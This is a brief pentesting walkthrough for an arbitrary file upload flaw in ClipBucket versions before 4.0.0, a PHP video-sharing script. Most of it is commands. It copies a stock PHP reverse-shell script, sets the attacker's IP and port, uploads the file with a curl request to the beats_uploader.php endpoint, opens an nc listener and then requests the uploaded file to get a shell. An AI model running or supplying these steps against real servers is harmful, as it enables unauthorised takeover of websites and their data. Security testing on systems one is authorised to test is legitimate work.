ClipBucket Pentesting

ClipBucket is a freely downloadable PHP script that will let you start your own Video Sharing website (YouTube Clone).

Arbitrary File Upload < v4.0.0

ClipBucket versions before 4.0.0 is vulnerable to file upload in ‘uploader’ actions. We can upload arbitrary files so we can execute reverse shell.

1. Prepare Payload

Create a PHP script to reverse shell in local machine.

cp /usr/share/webshells/php/php-reverse-shell.php ./shell.php

Update $ip and $port with your local ip address and port.

2. Upload the Payload

Next upload the above PHP script to the target website.

curl -F "file=@shell.php" -F "plupload=1" -F "name=shell.php" "https://example.com/actions/beats_uploader.php"

3. Reverse Shell

In local machine, start a listener.

nc -lvnp 4444

Then access to https://example.com/actions/CB_BEATS_UPLOAD_DIR/<uploaded_filename>.php.
We should get a shell.